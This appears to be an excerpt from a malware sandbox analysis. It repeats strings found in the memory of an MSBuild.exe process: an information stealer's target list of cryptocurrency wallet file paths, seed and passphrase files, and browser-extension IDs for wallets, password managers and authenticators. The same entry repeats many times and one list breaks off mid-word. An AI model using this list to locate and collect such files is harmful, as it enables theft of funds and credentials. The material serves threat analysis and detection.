                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
